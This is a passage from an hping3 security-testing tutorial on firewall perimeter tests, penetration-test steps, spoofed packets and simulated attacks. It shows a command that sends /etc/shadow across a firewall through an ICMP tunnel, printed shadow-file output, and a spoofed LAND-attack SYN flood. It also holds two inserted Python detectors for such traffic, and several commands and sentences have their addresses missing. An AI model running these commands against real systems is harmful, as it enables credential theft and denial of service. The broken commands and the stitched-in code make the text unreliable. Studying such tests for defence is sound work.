Security testing with hping

Perimeter Testing

Perimeter testing means determining exactly what your firewall blocks and what it allows. To conduct a good test, you can spoof source IP addresses and source ports:

sudo hping3 -a -S james -c 2 -p 80

The result of the above command is that packets will appear to originate from the system at Such a packet is useful for determining whether the firewall is allowing random packets in or out of your network.

In these cases, you don't have to use TCP. Using hping, you can generate UDP packets as well:

sudo hping3 targethost -c 2 --udp --baseport 80 --destport 80

The preceding command sends two UDP packets to port 80 on the target system from port 80 of your own system.

Of course, you can spoof the source IP address as well as the originating and destination ports:

sudo hping3 localhost -a -c 2 --udp --baseport 80 --destport 80

Penetration Testing

It's not enough to know how to use hping3; you also need to understand the basics of a penetration test. A typical test includes the following basic steps:

  • Network resource identification: This step is sometimes called network mapping, network footprinting, or target identification. The step involves scanning systems for open ports, fingerprinting operating systems, and determining the types of applications that are operating on open ports.
  • Scanning for vulnerabilities: Looking for vulnerabilities on server, firewall, and VoIP operating systems. You also conduct tests designed to break the existing authentication scheme. Once you are finished cracking systems, you then prioritize resources you have identified. For example, a system may have a fairly serious vulnerability that might not be very important. You might need to actually assign this system a lower priority than others that are considered more vital, especially if the vulnerable system isn't likely to become a stage for an attack. Many times, this step is considered part of the network resource identification, but I like to treat this activity as something separate. Determining vulnerabilities is a complex task that requires quite a bit of analytical thought.
  • Perimeter testing: A classic activity for hping3. For example, you can use hping3 to generate traffic that tests whether the firewall is capable of blocking spoofed internal packets.
  • Intrusion detection testing: In this step, you generate traffic to see if the intrusion detection system is capable of identifying anomalies and problems. Applications such as hping3 are perfect for generating such anomalous traffic.
  • Consideration of security policy and end user issues: In this step, you determine the effectiveness of the security policy, and how well the network's applications ensure compliance. You also determine how well end users comply with the security policy. Although this last step isn't really relevant to applications such as hping3, it's important to understand that an auditor does more than scan systems and generate packets.

Sending Files

Creating a tunnel is one way to find out what your firewall is capable of blocking. On your receiving system, issue the following command:

host$ sudo hping3 -I eth0 --listen signature --icmp

To send the contents of the file on your local system to a remote system named james, issue the following command:

user@host:~$ sudo hping3 -I eth0 localhost --icmp -d 100 --sign signature --file /etc/shadow

On your receiving system's terminal, you will see the output of the file you're sending (see Listing 4).

Listing 4

Sending a File

Warning: Unable to guess the output interface
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
99999:7:::
proxy:*:14181:0:99999:7:::
www-data:*:14181:0:99999:7:::
backup:*:14181:0:99999:99999:7:::
proxy:*:14181:0:99999:7:::
www-data:*:14181:0:99999:7:::
backup:*:14181:0:99999:7:::
list:*:14181:0:99999:7:::
irc:*:14181:0:99999:7:::
gnats:*:14181:0:99999:7:::
nobody:*7:::
nobody:*^C
[output snipped due to hitting Ctrl + C to end the transmission]
---  hping statistic ---
0 packets transmitted, 0 packets received, 0% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Notice that the contents of the file have been sent through the firewall. Also notice that I've decided to send the contents of a particularly sensitive file. Creating an ad-hoc tunnel in this way allows quick file transfer back and forth across a firewall. Furthermore, this feature is useful for testing exactly what a firewall is capable of blocking.
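The listen side above works because --sign places the signature string in the first bytes of the ICMP data and --listen prints whatever follows it, which is also what a monitoring point can look for. The following added example (not from the article, and not part of hping) classifies constructed ICMP echo payloads: it checks for a known signature at the start of the data and, as an assumed heuristic rather than a standard, treats a mostly printable payload as suspicious, since an ordinary ping payload is a timestamp plus a fixed byte pattern.

```python
import string

# Constructed sample payloads (not captured from the article's session).
# The "normal_ping" payload is modelled on the iputils ping default:
# a 16-byte timestamp followed by the byte pattern 0x10..0x37.
SIGNATURE = b"signature"
PING_PATTERN = bytes(range(0x10, 0x38))
SAMPLES = {
    "normal_ping": b"\x00" * 16 + PING_PATTERN,
    "hping_tunnel": SIGNATURE + b"proxy:*:14181:0:99999:7:::\nwww-data:*:14181:0:99999:7:::\n",
    "text_no_sig": b"backup:*:14181:0:99999:7:::\nlist:*:14181:0:99999:7:::\n",
}


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (0.0 for an empty payload)."""
    if not data:
        return 0.0
    printable = set(string.printable.encode())
    return sum(b in printable for b in data) / len(data)


def classify_icmp_payload(data: bytes, signatures=(SIGNATURE,), text_threshold=0.9):
    """Return the reasons a payload looks like a tunnel; an empty list means benign."""
    reasons = []
    for sig in signatures:
        if data.startswith(sig):
            reasons.append(f"known hping signature {sig!r} at payload start")
    # Heuristic (assumption): ping data is timestamp + fixed pattern, so a
    # payload that is almost entirely printable text is worth a closer look.
    ratio = printable_ratio(data)
    if ratio >= text_threshold and len(data) >= 32:
        reasons.append(f"{ratio:.0%} printable bytes in a {len(data)}-byte payload")
    return reasons


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(name, classify_icmp_payload(payload) or "benign")
```

The signature check only catches senders that keep hping's default placement, so the printable-text heuristic is what covers a renamed or absent signature.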

Choosing an Audit Type

At the risk of oversimplifying, two types of audits exist: blind and non-blind. A blind audit is one in which you adopt the perspective of a hacker who doesn't know about the network and has to discover all of the systems. With a non-blind audit, you don't need to worry about discovering the systems; instead, you focus on scanning the systems for vulnerabilities. Regardless of the approach you take to auditing, your goal is to discover resources, show how to penetrate the defenses, and demonstrate how an attack could spread to other systems.

Simulating Attacks

The LAND attack [4], which first appeared in 1997, involves sending a spoofed packet with its SYN flag set to a target host. The spoofed packet's source IP address and source port are the same as the target host's own address and port. When the attack first appeared, it caused unpatched Windows systems (and some Linux systems) to create an infinite connection loop and crash.

Many attackers exploited this bug to wage simple, sophomoric, and highly annoying denial of service attacks. More sophisticated users realized that such attacks were useful for hijacking attacks.

A new variation of the LAND attack turned up in 2005, and this classic technique could easily appear again.

Hping3 can help you ensure that your systems are immune to such an attack. Suppose you want to test a system with the IP address of that has port 139 open. To do so, you would issue the following command:

sudo hping3 -S -a -k -s 139 -p 139 --flood

This attack could cause an unpatched target system to freeze. Also notice the --flood option, which sends thousands of packets to the system.
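Because a probe sent with -a is answered to the spoofed address, hping3's own statistics say nothing about what the firewall did with it, in the perimeter tests earlier or in the LAND probe here; the verdict has to come from the firewall's log. The following added example (not from the article, and not part of hping) parses constructed netfilter LOG lines to report the verdict for a spoofed probe and to flag the LAND pattern; the FW-DROP/FW-ACCEPT log prefixes and the RFC 5737 addresses are assumptions.

```python
import re

# Constructed syslog lines from an iptables ruleset that logs with the
# prefixes "FW-DROP " and "FW-ACCEPT " (assumed names, not from the article).
SAMPLE_LOG = """\
Jan 10 12:00:01 gw kernel: FW-DROP IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.5 LEN=40 TTL=64 ID=1 PROTO=TCP SPT=1234 DPT=80 WINDOW=512 RES=0x00 SYN URGP=0
Jan 10 12:00:02 gw kernel: FW-ACCEPT IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.5 LEN=28 TTL=64 ID=2 PROTO=UDP SPT=80 DPT=80 LEN=8
Jan 10 12:00:03 gw kernel: FW-ACCEPT IN=eth0 OUT= SRC=198.51.100.5 DST=198.51.100.5 LEN=40 TTL=64 ID=3 PROTO=TCP SPT=139 DPT=139 WINDOW=512 RES=0x00 SYN URGP=0
"""

FIELD_RE = re.compile(r"(\w+)=(\S*)")
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}


def parse_log_line(line):
    """Return (log prefix, KEY=VALUE fields, TCP flags) or None for non-LOG lines."""
    head, _, rest = line.partition(" IN=")
    if not rest:
        return None
    prefix = head.rsplit("kernel: ", 1)[-1].strip()
    rest = "IN=" + rest
    fields = dict(FIELD_RE.findall(rest))          # later LEN= wins; unused here
    flags = {tok for tok in rest.split() if tok in TCP_FLAGS}
    return prefix, fields, flags


def probe_verdicts(log_text, src, dst, proto, sport, dport):
    """Log prefixes recorded for packets matching one spoofed hping3 probe."""
    verdicts = []
    for line in log_text.splitlines():
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        prefix, f, _ = parsed
        if (f.get("SRC"), f.get("DST"), f.get("PROTO"), f.get("SPT"), f.get("DPT")) \
                == (src, dst, proto, str(sport), str(dport)):
            verdicts.append(prefix)
    return verdicts


def land_packets(log_text):
    """SYN packets whose source address and port equal the destination's (LAND)."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        prefix, f, flags = parsed
        if f.get("PROTO") == "TCP" and "SYN" in flags \
                and f.get("SRC") == f.get("DST") and f.get("SPT") == f.get("DPT"):
            hits.append((prefix, f["SRC"], f["SPT"]))
    return hits
```

A LAND line with an ACCEPT prefix, as in the third sample, means the perimeter is not filtering packets that claim an internal source, which is exactly what the spoofed perimeter tests are meant to reveal.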
